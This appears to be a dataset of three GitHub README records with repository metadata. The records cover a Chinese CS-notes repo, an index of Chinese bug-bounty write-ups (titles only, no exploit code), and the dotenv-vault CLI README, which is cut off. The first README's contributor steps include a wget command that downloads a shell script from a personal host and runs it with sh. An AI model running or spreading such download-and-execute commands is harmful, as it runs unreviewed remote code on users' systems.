ไธบไบ†ๆ–นไพฟๆฏไธ€ไฝๅผ€ๆบ็ˆฑๅฅฝ่€…ไบคๆตๅ’Œๅญฆไน ๏ผŒๆˆ‘ไปฌๅœจ slack ไธญ้›†ๆˆไบ† ๅพˆๅคš่‡ชๅŠจๅŒ–ๅทฅๅ…ทไปฅๅŠ AI๏ผŒๆฌข่ฟŽๅคงๅฎถ [๐Ÿ”ฅๅŠ ๅ…ฅ Slack](https://join.slack.com/t/kubecub/shared_invite/zt-1se0k2bae-lkYzz0_T~BYh3rjkvlcUqQ)ใ€‚ ## โœจ ๅ‚ไธŽ่ดก็Œฎ๐Ÿ’• **[๐Ÿซต ๅ‚ไธŽ่ดก็Œฎ๐Ÿ’–โค๏ธโ€๐Ÿฉน๐Ÿ’“๐Ÿ’ž](https://nsddd.top/archives/contributors)** **[๐Ÿ˜ ็”š่‡ณไฝ ๅฏไปฅๅœจ่ฟ™ไธช็•Œ้ขๆŒ‰ไธ‹`.`่ฟ›ๅ…ฅvscode็ผ–่ฏ‘็Žฏๅขƒ](https://nsddd.top/archives/githubdev)** **่ฆๆฑ‚๏ผš** + [ไฝ ้œ€่ฆๅญฆไผšไฝฟ็”จmarkdown๐Ÿ–ฑ๏ธ](https://github.com/cubxxw/awesome-cs-course/blob/master/markdown/README.md) + [็ฌฆๅˆGoogleไปฃ็ ่ง„่Œƒ](https://zh-google-styleguide.readthedocs.io/en/latest/google-cpp-styleguide/) <details><summary><b>๐Ÿซก ๅ…‹้š†ๆญคไป“ๅบ“ๅˆฐๆœฌๅœฐ</b></summary> <pre><code>git clone https://ghproxy.com/https://github.com/cubxxw/Block_Chain.git ่œ้ธŸ็š„ๆˆ้•ฟๆ‰‹ๅ†Œ </code></pre> <pre><code>wget -c -d -O gitsync.sh https://sm.nsddd.top/uploads/2022/10/27/Y0iHb6ix_gitsync.sh?attname=gitsync.sh && echo "gitsync.sh" >> .gitignore && sh gitsync.sh ่ฟ™้‡Œๅ†™ๆไบคไฟกๆฏ~ && chmod 777 gitsync.sh </code></pre> </details> <br> <font size = 2>๐ŸŽฏ ๅฆ‚ๆžœไฝ ไนŸๆƒณๅฏนๆœฌ้กน็›ฎๅšๅ‡บ่ดก็Œฎ๏ผŒ้‚ฃไนˆไฝ ๅฏไปฅๅ…ˆๆŠŠ่ฏฅ้กน็›ฎ่ฟ›่กŒ [fork](https://github.com/cubxxw/cs-awesome-Block_Chain/fork)ๆˆ–่€… `git clone` ๅˆฐๆœฌๅœฐ๏ผˆๆŽจ่ๅ…ˆ็”จย [fock](https://github.com/cubxxw/cs-awesome-Block_Chain/fork)ๅˆฐ่‡ชๅทฑไป“ๅบ“๏ผŒ็„ถๅŽๅ†cloneๅˆฐๆœฌๅœฐ๏ผŒๅฏนๆœฌๅœฐ่ฟ›่กŒๆ“ไฝœ๏ผŒๆœ€ๅŽไปŽ่‡ชๅทฑไป“ๅบ“่ดก็Œฎ๏ผŒ็„ถๅŽ่‡ชๅทฑๅปบ็ซ‹ไธ€ไธชๅˆ†ๆ”ฏ `your-branch`๏ผŒ็„ถๅŽไธŠไผ ่ต„ๆ–™ๅˆฐ ๅฏนๅบ”็›ฎๅฝ• ไธ‹๏ผŒๅ›พ็‰‡ไฟกๆฏๅฏไปฅไธŠไผ ๅˆฐ` /images`๏ผŒ็„ถๅŽๆ›ดๆ–ฐ `README`ใ€‚ </font> ## [![Repography logo](https://images.repography.com/logo.svg)](https://repography.com) / Recent activity [![Time period](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_badge.svg)](https://repography.com) ![Alt](https://repobeats.axiom.co/api/embed/7053fe17b2bd9f88a0015474635e09cff7dc1ee2.svg "Repobeats analytics image") [![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2F3293172751%2Fcs-awesome-Block_Chain.svg?type=shield)](https://app.fossa.com/projects/git%2Bgithub.com%2F3293172751%2Fcs-awesome-Block_Chain?ref=badge_shield) [![Timeline graph](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_timeline.svg)](https://github.com/cubxxw/Block_Chain/commits) [![Issue status graph](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_issues.svg)](https://github.com/cubxxw/Block_Chain/issues) [![Pull request status graph](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_prs.svg)](https://github.com/cubxxw/Block_Chain/pulls) ![Trending topics](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_words.svg) <br> ## ๐Ÿ’ก ็‰ˆๆƒๅฃฐๆ˜Ž &copy; [![GitHub license](https://sm.nsddd.top//typora/cs-awesome-Block_Chain?mail:3293172751@qq.com)](http://zh.wikipedia.org/wiki/Wikipedia:CC-by-sa-3.0ๅ่ฎฎๆ–‡ๆœฌ) ***License**:* ๆœฌไนฆๆ‰€ๆœ‰ๅ†…ๅฎน้ตๅพช[CC-BY-SA 3.0ๅ่ฎฎ๏ผˆ็ฝฒๅ-็›ธๅŒๆ–นๅผๅ…ฑไบซ๏ผ‰&copy;](http://zh.wikipedia.org/wiki/Wikipedia:CC-by-sa-3.0ๅ่ฎฎๆ–‡ๆœฌ) [![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2F3293172751%2Fcs-awesome-Block_Chain.svg?type=large)](https://app.fossa.com/projects/git%2Bgithub.com%2F3293172751%2Fcs-awesome-Block_Chain?ref=badge_large) </br>
๐Ÿ“š ่œ้ธŸๆˆ้•ฟๆ‰‹ๅ†Œ๐Ÿš€ CS็ณปๅˆ— ใ€ไบ‘ๅŽŸ็”Ÿ็ณปๅˆ—ใ€ๅŒบๅ—้“พ็ณปๅˆ—ใ€web3็ณปๅˆ—๐Ÿ”ฅใ€Golang็ณปๅˆ—๐Ÿ’ก......
go,blockchain,docker,fabric,git,mysql,linux,web,awesome,kubernetes
1
7
36
495
4
18
7
J0o1ey/BountyHunterInChina
# BountyHunterInChina๏ผˆ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ๏ผ‰ ## ๆ–‡็ซ ๅˆ—่กจ | ๆ–‡็ซ ๅ | ไฝœ่€… | | :----------------------------------------------------------- | ------- | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไธ€)-่ฝปๆพGETๆŸsrc soapๆณจๅ…ฅ | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไบŒ)-้€†ๅ‘app็ ด่งฃๆ•ฐๆฎๅŒ…signๅ€ผๅฎž็Žฐไปปๆ„ๆ•ฐๆฎ้‡ๆ”พๆทปๅŠ  | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไธ‰)-ๆ— ่„‘ๆŒ–ๆŽ˜ๆŸSRC Getshell | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅ››)-่ฎฐไธ€ๆฌกๆœ‰่ถฃ็š„ๅฎขๆˆท็ซฏRCEใ€ๆœๅŠก็ซฏXXEๆŒ–ๆŽ˜ | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไบ”)-ๅคšๆ‰‹ๆณ•็ป•่ฟ‡WAFๆŒ–ๆŽ˜ๆŸ็ŸฅๅๅŽ‚ๅ•†XSS | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅ…ญ)-ๅผบ่กŒๅคšๆฌกFUZZๅ‘็ŽฐๆŸๅŽ‚ๅ•†SSRFๅˆฐredisๅฏ†็ ๅ–ทๆด’ๆ‰น้‡ๅๅผนShell | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไธƒ)-็œ‹ๆˆ‘ๅฆ‚ไฝ•ไปŽFUZZๅˆฐXSSๅœจSRCๅฎ˜็ฝ‘ๅท่ตฐไฝ ็š„ไธชไบบไฟกๆฏ | RG | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅ…ซ)-่ฎฐไธ€ๆฌก็งป่ŠฑๆŽฅๆœจ็š„GetShell | RG | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไน)-ไปŽๆœฌๆ— ๆณ•่งฆๅ‘็š„xssๅˆฐๆขฆๅนป่”ๅŠจๆŒ–ๆŽ˜ๅคšไธช่‡ดๅ‘ฝๆŽฅๅฃไธ‹็š„XSS่งฆๅ‘็‚น | h0af3ng | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅ)-ๆŸๅคงๅŽ‚ไปŽๅบŸๅผƒsso็™ป้™†ๅฃๅˆฐๅคšๆ€่ทฏfuzz่Žทๅ–ๅ„ๅœฐ้ซ˜็ฎกไฟกๆฏ | Cat | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅไธ€)-ๆŸSRCๅ‚จๅญ˜XSSๅคšๆฌกBypassWAFๆŒ–ๆŽ˜ | h0af3ng | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅไบŒ)-่ฎฐไธ€ๆฌกๅฏนๆŠ—้ฃžๅก”ๆต้‡ๆฃ€ๆต‹็š„ๆ–‡ไปถไธŠไผ  | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅไธ‰)-ๆขฆไธญ็ปๆ€ๆŸ่„–ไปฃ็†ๅ•†ๅŽๅฐ | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅๅ››)-ๅทง็”จ็›ฎๆ ‡ๅŸŸๅ็‰น็‚นๆŒ–ๆŽ˜ๆŸๆ–ฐไธŠSRCๅ››ๅค„RCE | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅไบ”)-ไปŽๅฟฝ็•ฅๅˆฐtriage็š„SSRFๆŒ–ๆŽ˜ไน‹ๆ—… | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจไธๅˆฐๅฃๅญ(ๅๅ…ญ)-่ฎฐไธ€ๆฌกๆœ€็ปˆ่ขซๅฟฝ็•ฅ็š„graphqlๆผๆดžๆŒ–ๆŽ˜็ปๅŽ† | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(็•ชๅค–็ฏ‡โ‘ )-ๆต…่ฎฐไธ€ๆฌกๅฑ‚ๅฑ‚็ช็ ด็š„ๆ”ป้˜ฒๆผ”็ปƒ | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(็•ชๅค–็ฏ‡โ‘ก) - ๆŸๅคด้ƒจ็›ด่พ–ๅธ‚ๆ”ป้˜ฒๆผ”็ปƒ็บชๅฎž-ๅฆ‚ไฝ•ไธ็”จ0dayๆ‰“ไธ‹nไธช็‚น | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๆ˜ฏ่ต้‡‘็ŒŽไบบๅˆ่ฎขๆœฌ(2023ๅนด4ๆœˆๅ‰็š„ๅˆ้›†) | J0o1ey | | ๆœชๅฎŒๅพ…็ปญ | | | ๆฌข่ฟŽๆŠ•็จฟ | | ### ้กน็›ฎไบคๆต็พค/ๅนฟๅ‘Š **ๅบ”ๅคงๅฎถ่ฆๆฑ‚๏ผŒๅผ€ไธ€ไธช้กน็›ฎไบคๆต็พค๏ผŒไบบๆปกๆˆ–่€…ไบŒ็ปด็ ่ฟ‡ๆœŸๅฏ่”็ณป็ฌ”่€…Vxๆ‹‰ๆ‚จๅ…ฅ็พค๏ผˆๆฌข่ฟŽๅคงๅฎถ่ฎจ่ฎบๅ‰ๆฒฟ็š„ๆผๆดžๆŒ–ๆŽ˜/ๆ”ป้˜ฒcase๏ผŒๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ็š„็”Ÿๆดปไฝ“ๆ‚Ÿ** **ไนŸๆฌข่ฟŽๅคงๅฎถๅ’Œ็ฌ”่€…่ฟ›่กŒๆŠ€ๆœฏไบคๆตไธŽๆŽข่ฎจ๏ผˆๅธŒๆœ›ๆˆ‘ไปฌๅฏไปฅไปŽไบคๆต่ฟ‡็จ‹ไธญ้ƒฝๆœ‰ๆ”ถ่Žท๏ผŒ่€Œไธๆ˜ฏไธ€ๆ–นๅฝ“ไผธๆ‰‹ๅ…š๏ผ‰** **ไธบไบ†่กฅ่ดดๅŒ—ๆผ‚ๆœŸ้—ดๅฎถ็”จ๏ผŒๅฆ‚ๆžœๅคงๅฎถๅฏน็ฌ”่€…็š„<ๅ…จๆ ˆๅผ้ป‘็™ฝ็›’ๆผๆดžๆŒ–ๆŽ˜/ๆ”ป้˜ฒๅŸน่ฎญ>็ญ‰ไธšๅŠกๆ„Ÿๅ…ด่ถฃ๏ผŒๆˆ–ๆœ‰ๅ…ถไป–ๅˆ่ง„็š„้กน็›ฎ้œ€ๆฑ‚๏ผŒไนŸๆฌข่ฟŽ็งไฟก็ฌ”่€…๏ผŒๆ„Ÿ่ฐขๅคงๅฎถๅฏน็ฌ”่€…็”Ÿๆดปไธๆ˜“็š„็†่งฃ** ![้กน็›ฎๅ›พmin](https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202402021520821.jpg) ## Update History ### 2024ๅนด2ๆœˆ ๆ›ดๆ–ฐ ็ช็„ถๅ‘็Žฐๅทฒ็ปๆœ‰ๅฐ†่ฟ‘ไธ€ๅนดๆฒกๆœ‰ๆ›ดๆ–ฐไบ†๏ผŒ่ฟ™ไธ€ๅนด็ฌ”่€…ๅšๆ”ป้˜ฒ/Pentest็ฑป็š„ๅทฅไฝœๅทฒ็ปไธๆ˜ฏๅพˆๅคšไบ†๏ผŒๆ›ดๅคš็š„ๆ—ถ้—ดๆŠ•ๅ…ฅๅˆฐไบ†ไผไธšๅฎ‰ๅ…จๅปบ่ฎพ็š„ๅญฆไน ใ€ๆ€่€ƒไธŽๅฎž่ทตไธญ๏ผŒๅ› ๆญคไนŸๆฒกๅ•ฅไผ˜่ดจ็š„ๅ†…ๅฎนๅฏไปฅๆ›ดๆ–ฐ๏ผŒๆ›ดๆ–ฐ็ผ“ๆ…ข๏ผŒ่ฟ˜ๆœ›ๅคงๅฎถ่ง่ฐ… **็ป“ๅˆ่ฟ‘ไธ€ๅนดๅฎ‰ๅ…จ่กŒไธš็š„ๆƒจๆทกๅคงๅฝขๅŠฟๅ’Œ็ฌ”่€…ๅŒ—ๆผ‚็š„ๅˆ‡่บซไฝ“้ชŒ๏ผŒ2024.2.1 ๆœฌ้กน็›ฎๅ†ณๅฎšๆ›ดๅไธบโ€œ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญโ€** **ไปฅๆ›ดๅŠ ๅˆ‡ๅˆๅฎž้™…็š„็”Ÿๅญ˜็Žฐ็Šถไธบๆ ‡้ข˜๏ผŒๆ็ป˜ไธ€็‚นๆœ‰ๆ„ๆ€็š„ๆŠ€ๆœฏcase๏ผŒ่ฟ™ไพฟๆ˜ฏๆ”นๅ็š„ๅˆ่กท** ### 2023ๅนด4ๆœˆ ๆ›ดๆ–ฐ ็ปๅŽ†ไบ†ๅŽปๅนดไธ€ๅนด็–ซๆƒ…ๅคง่ƒŒๆ™ฏไธ‹็š„ไบ’่”็ฝ‘ๅฏ’ๅ†ฌ๏ผŒๅนดๅˆๆ—ถ่Š‚๏ผŒ็ปˆไบŽ็ญ‰ๅˆฐไบ†ๆ˜ฅๅ›žๅคงๅœฐ๏ผŒ็–ซๆƒ…ๆ—ถไปฃ็š„ๅŸบๆœฌ็ป“ๆŸใ€‚ไฝ†ๆ˜ฏๅพˆ้—ๆ†พ๏ผŒ็ปๅŽ†ไบ†ๅŽปๅนด็š„ไบๆŸๅŽ๏ผŒ็ฌ”่€…็š„ๅฐๅพฎไผไธšๅทฒ็ป็†ฌไธ่ฟ‡ไปŠๅนดๅนดไธญไบ†๏ผŒไฝœไธบไธ€ไธช20ๆฅๅฒ็š„ๅˆ›ไธš่€…ๅ‡†ๅค‡็”ณ่ฏท่‚กๆƒ่ฝฌ่ฎฉไบ†๏ผŒ้ข‡ๆœ‰ไบ›ๆ„Ÿๆ…จใ€‚่‡ชๅทฑๅฟ™้‡Œๅฟ™ๅค–๏ผŒ็ปˆ็ฉถ่ฟ˜ๆ˜ฏ่ฆ่€่€ๅฎžๅฎžๅœฐๆ”พไธ‹้‚ฃไบ›ไธๅˆ‡ๅฎž้™…็š„ๆƒณๆณ•๏ผŒๆŽฅๅ—็Žฐๅฎžๅ’Œๅธ‚ๅœบ็š„ๆฎ‹้…ทใ€‚ ๅšๅ…ฌๅธๅ’ŒไธšๅŠก็š„่ฟ™ไธคๅนด๏ผŒ็ฌ”่€…็ปๅŽ†ไบ†ๅพˆๅคš๏ผŒ้™คๅŽปๅฐ‘้ƒจๅˆ†ๆˆๅ•็š„็ปฝๆ”พๆ—ถๅˆป๏ผŒๅคง้ƒจๅˆ†ๆ—ถๅ€™ๅคš็š„่ฟ˜ๆ˜ฏ่ขซไบบๅฟƒๅ’Œไบบๆ€งๆ‰“็š„้ผป้’่„ธ่‚ฟ็š„ๆ„Ÿๆ‚Ÿใ€‚ๆ—ถๆ—ถๅˆปๅˆป่€ƒ่™‘ไผไธš่ƒฝๅฆๆดป่ฟ‡ไธ‹ไธ€ไธชๅญฃๅบฆ๏ผŒ่ฟ™่ฎฉไธ€ไธช20ๆฅๅฒ็š„ๅนด่ฝปไบบ่บซๅฟƒไฟฑ็–ฒ๏ผŒๆ„Ÿๅˆฐ่ฟทๆƒ˜ใ€ไธๅฎ‰ๅ’Œๆตฎ่บ๏ผŒ่ฟทๅคฑไบ†ๅพˆๅคš็š„ๅˆๅฟƒไธŽ็ƒญ็ˆฑใ€‚ๆ‰€ไปฅๆˆ‘้€‰ๆ‹ฉ็ป™่ถณ่‡ชๅทฑๆฒ‰ๆท€็š„ๆ—ถ้—ด๏ผŒๅฏป่ง…ๆœฌๅฟƒ๏ผŒ่€Œไธๆ˜ฏๅœจๅนด่ฝปๅˆฐไธ่ƒฝๅ†ๅนด่ฝป็š„ๅฒๆœˆ้‡Œๆ€ฅไบŽๆฑ‚ๆˆใ€‚ ๅฆ‚ไปŠๅ›ž้ฆ–็œ‹ๆฅ๏ผŒๅฏ่ƒฝๅŒๆ—ถๅšๆŠ€ๆœฏๅ’Œๅ•†ไธš็š„ไบบ๏ผŒๅฟƒไธญๆœ€็บฏ็ฒน็š„ไธœ่ฅฟๅฏ่ƒฝไนŸๅชๅ‰ฉไธ‹ๆŠ€ๆœฏไบ†ใ€‚็ฌ”่€…ๅฐๆ—ถๅ€™่ขซ้ป‘ๅฎข็š„ๆ•…ไบ‹ๅธๅผ•๏ผŒไปŽๅฐๅˆฐๅคง๏ผŒไธ€ไธๅฐๅฟƒๅšๆŒๅญฆไน ๅฎ‰ๅ…จๅทฒ็ปๅฅฝไบ›ๅนดไบ†๏ผŒๅ—ๆ™บๅ•†ๅ’Œๅคฉ่ต‹ๆ‰€้™๏ผŒ่‡ชๅทฑๅญฆไบ†ๆŒบไน…ไพ็„ถๆ˜ฏ่œ้ธกๆฐดๅนณใ€‚ๅœจๅญฆๅฎ‰ๅ…จ็š„่ฟ™ไบ›ๅนด่ขซๆœ‹ๅ‹ไปฌ้—ฎๅˆฐๆœ€ๅคš็š„ไธ€ไธช้—ฎ้ข˜ๅฐฑๆ˜ฏโ€”โ€”โ€œๆˆ‘ๅญฆไบ†owasp top10ๆผๆดžๅŸบ็ก€ๅŽ๏ผŒๅฆ‚ไฝ•ๆœ‰ๆ•ˆๅœฐๆŒ–ๆŽ˜ๆผๆดžโ€๏ผŒๆฏๆฌก่ขซ้—ฎๅˆฐ่ฟ™็ง้—ฎ้ข˜๏ผŒๆˆ‘่ฏ็ฉท็š„ๅ›ž็ญ”้ƒฝๆ˜ฏโ€œ่กฅ่ถณๅŸบ็ก€๏ผŒ่กฅ่ถณๅŸบ็ก€๏ผŒ่กฅ่ถณๅŸบ็ก€โ€ใ€‚ ๅœจ็ฌ”่€…ไป…ๆœ‰็š„ไธ€็‚น็Ÿฅ่ฏ†ๅ‚จๅค‡้‡Œไธญ๏ผŒ็ฌ”่€…ไธ€็›ดๅšไฟก๏ผŒๅœจๆ— ่ฎบๅœจๆ”ป่ฟ˜ๆ˜ฏ้˜ฒ๏ผŒๅช่ฆๆ‹ฟๆๅฅฝๅผ€ๅ‘็š„็‰นๆ€ง๏ผŒ่ฟ็ปด็š„ไน ๆ€ง๏ผŒไบบ็ฑป็š„ๆœฌๆ€งโ€”โ€”ๅฐฑ่ƒฝๆ— ๅพ€ไธๅˆฉ ๅ› ๆญค็ฌ”่€…ๅฐ†่ฟ™ไธ€ไธคๅนด็š„ๆ–‡็ซ ๆ”ถๅฝ•่ตทๆฅๅšๆˆๅˆ่ฎขๆœฌ๏ผŒๅ…ฑ12ๅฐ่Š‚๏ผŒ12890ๅญ—๏ผŒๅธŒๆœ›ๅคšๅฐ‘่ƒฝ็ป™ๅคงๅฎถ็œ‹ๅˆฐไธ€ไบ›ๆœ‰่ถฃ็š„ๅฎ‰ๅ…จ้—ฎ้ข˜ใ€‚ๆ–‡็ซ ไธญ็š„ๅ›พ้ƒฝๆ˜ฏP็š„๏ผŒไธๆถ‰ๅŠไปปไฝ•โ€œๅฎž้™…ๆผๆดžโ€ๅซไน‰ใ€‚็ฌ”่€…ๆƒณ่ฏด๏ผŒๅœจ่ฟ™ไธช็Ÿฅ่ฏ†ไป˜่ดน๏ผŒๆŠ€ๆœฏไบบๅ‘˜็ผบ้’ฑ่ฐ‹็”Ÿๅญ˜๏ผŒๅฐๅพฎไผไธš็š„ๅ‘ๅฑ•ไธพๆญฅ็ปด่‰ฐๆ—ถไปฃ้‡Œ๏ผŒๅšๆŒๅšๅ…่ดน็š„ๅˆ†ไบซๅฎžๅฑžไธๆ˜“ใ€‚่กฃ้ฃŸ่ถณ่€Œ็Ÿฅ่ฃ่พฑ๏ผŒไป“ๅปชๅฎž่€Œ็Ÿฅ็คผ่Š‚๏ผŒๅพˆ้—ๆ†พ๏ผŒ็ฌ”่€…ๆ˜ฏไธชไธบๅฝฉ็คผๅ‘ๆ„๏ผŒๆˆฟๅญไนŸไนฐไธ่ตท็š„็ฉท้ฌผ๏ผŒ็Ÿญๆ—ถๆœŸๅ†…ไนŸๆ— ๆณ•็ปง็ปญๆ›ดๆ–ฐไบ†๏ผŒ่ฆ็œๅ‡บๆ—ถ้—ดๅ’Œ็”Ÿๆดปๅฏน็บฟไบ†๏ผŒๅธŒๆœ›ๅ„ไฝ็†่งฃใ€‚ ๅธŒๆœ›ๅœจๅฐ†ๆฅ็š„ๆŸไธ€ๅคฉ๏ผŒๆˆ‘ไปฌๅœจไธ‹ไธ€ๅœบๅฑฑๆตท็›ธ้‡ใ€‚ ## Q&A 1.ๅŒๆ—ถๅ…ณไบŽๆผๆดž้ป‘็™ฝ็›’ๆŒ–ๆŽ˜๏ผŒๅพˆๅคšไบบๅ’จ่ฏข็ฌ”่€…โ€”โ€”โ€œ่‡ชๅทฑๆฒกๆ€่ทฏๆ€ŽไนˆๅŠž?โ€ **้’ˆๅฏน่ฟ™ไธช้—ฎ้ข˜๏ผŒ็ฌ”่€…ๆƒณ่ฏด๏ผŒไธ่ฆๆŠŠๆผๆดžๆŒ–ๆŽ˜็š„ๅธŒๆœ›ๅฏ„ๆ‰˜ไบŽโ€œๅ–ๅทงโ€๏ผŒ็Žฐๅœจ็š„ๆผๆดžไบงๅ‡บ็Žฏๅขƒๆ—ฉๅทฒไธๆ˜ฏไปฅๅ‰้‚ฃไธช่„šๆœฌๅฐๅญ้ƒฝ่ƒฝๆ—ฅๅคฉไธ‹็š„ๅนดไปฃไบ†ใ€‚** **ๆ˜Žๆ™บไน‹้€‰ๆ˜ฏ่€่€ๅฎžๅฎžๆŠŠๅผ€ๅ‘ๅ’Œๅฎ‰ๅ…จ็Ÿฅ่ฏ†็š„ๅŸบ็ก€ๆ‰“็‰ข๏ผŒๅŸบ็ก€ๅคŸๅŽšๅฎž๏ผŒๆ€่ทฏไธŽ็ตๆ„Ÿๅชๆ˜ฏ้™„ๅฑžๅ“๏ผŒๅŽš็งฏๆ‰่ƒฝ่–„ๅ‘** ## ้กน็›ฎStar่ถ‹ๅŠฟ [![Stargazers](https://starchart.cc/J0o1ey/BountyHunterInChina.svg)](https://starchart.cc/J0o1ey/BountyHunterInChina.svg)
้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ็ณปๅˆ—๏ผŒๅˆ†ไบซๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ่ฟ‡็จ‹ไธญ๏ผŒSRCใ€้กน็›ฎๅฎžๆˆ˜็š„ๆœ‰่ถฃๆกˆไพ‹
null
0
1
0
55
0
1
0
dotenv-org/dotenv-vault
![dotenv.org](https://dotenv.org/banner.png) `dotenv-vault` is a cli to *sync .env files across machines, environments, and team members*. [![NPM Version](https://img.shields.io/npm/v/dotenv-vault.svg?style=flat-square)](https://npmjs.org/package/dotenv-vault) ## ๐ŸŒฑ Install It works with a single command. Run `npx dotenv-vault@latest push`. ```sh npx dotenv-vault@latest push ``` ``` remote: Securely pushing (.env)... done remote: Securely pushed development (.env) remote: Securely built vault (.env.vault) ``` That's it. You securely synced your `.env` file. Next, tell your teammate to run `npx dotenv-vault@latest pull` ```sh npx dotenv-vault@latest pull ``` Nice! See further [usage](#%EF%B8%8F-usage) and [commands](#-commands). --- #### Other Ways to Install Don't want to use [npx](https://docs.npmjs.com/cli/v7/commands/npx)? Install a number of other ways. <p><img alt="apple icon" src="https://api.iconify.design/mdi/apple.svg" width="20" /> Install via <a href="https://github.com/dotenv-org/homebrew-brew">Homebrew</a></p> ```bash $ brew install dotenv-org/brew/dotenv-vault $ dotenv-vault help ``` <p><img alt="windows icon" src="https://api.iconify.design/mdi/windows.svg" width="20" /> Install on <a href="https://dotenv-vault-assets.dotenv.org">Windows</a></p> * [32-bit installer](https://dotenv-vault-assets.dotenv.org/channels/stable/dotenv-vault-x86.exe) * [64-bit installer](https://dotenv-vault-assets.dotenv.org/channels/stable/dotenv-vault-x64.exe) <p><img alt="docker icon" src="https://api.iconify.design/mdi/docker.svg" width="20" /> Install and run commands via <a href="https://hub.docker.com/r/dotenv/dotenv-vault">Docker</a></p> ```bash $ docker run -w $(pwd) -v $(pwd):$(pwd) -it dotenv/dotenv-vault help ``` <a href="https://www.dotenv.org/install/">Learn more about installation</a> ## ๐Ÿ—๏ธ Usage When you make a change to your `.env` file, push it up. ```bash $ npx dotenv-vault@latest push ``` Commit your `.env.vault` file safely to code. ```bash $ git add .env.vault $ git commit -am "Add .env.vault" $ git push ``` Now your teammate can pull the latest `.env` changes. ```bash $ git pull $ npx dotenv-vault@latest pull ``` That's it! <a href="https://www.dotenv.org/docs/quickstart?r=1">Learn more about usage</a> ## ๐Ÿš€ Deploying Stop scattering your production secrets across multiple third-parties and tools. Instead, use an encrypted `.env.vault` file. Generate your encrypted `.env.vault` file. ```bash $ npx dotenv-vault@latest build ``` Fetch your production `DOTENV_KEY`. ```bash $ npx dotenv-vault@latest keys production remote: Listing .env.vault decryption keys... done dotenv://:key_1234โ€ฆ@dotenv.org/vault/.env.vault?environment=production ``` Set `DOTENV_KEY` on your server. ```bash # heroku example heroku config:set DOTENV_KEY=dotenv://:key_1234โ€ฆ@dotenv.org/vault/.env.vault?environment=production ``` Commit your `.env.vault` file safely to code and deploy. ```bash $ git add .env.vault $ git commit -am "Update .env.vault" $ git push $ git push heroku main # heroku example ``` That's it! On deploy, your `.env.vault` file will be decrypted and its secrets injected as environment variables โ€“ just in time. <a href="https://www.dotenv.org/docs/quickstart?r=1">Learn more about deploying</a> ## ๐ŸŒด Manage Multiple Environments After you've pushed your `.env` file, dotenv-vault automatically sets up multiple environments. Manage multiple environments with the included UI. [learn more](/docs/tutorials/environments) ``` $ npx dotenv-vault@latest open production ``` That's it! Manage your ci, staging, and production secrets from there. Would you also like to pull your production `.env` to your machine? Run the command: ``` $ npx dotenv-vault@latest pull production ``` โ„น๏ธ **๐Ÿ” Vault Managed vs ๐Ÿ’ป Locally Managed**: The above example, for brevity's sake, used the ๐Ÿ” Vault Managed solution to manage your `.env.vault` file. You can instead use the ๐Ÿ’ป Locally Managed solution. [See the faq further below](#how-do-i-use--locally-managed-dotenv-vault). Our vision is that other platforms and orchestration tools adopt the `.env.vault` standard as they did the `.env` standard. We don't expect to be the only ones providing tooling to 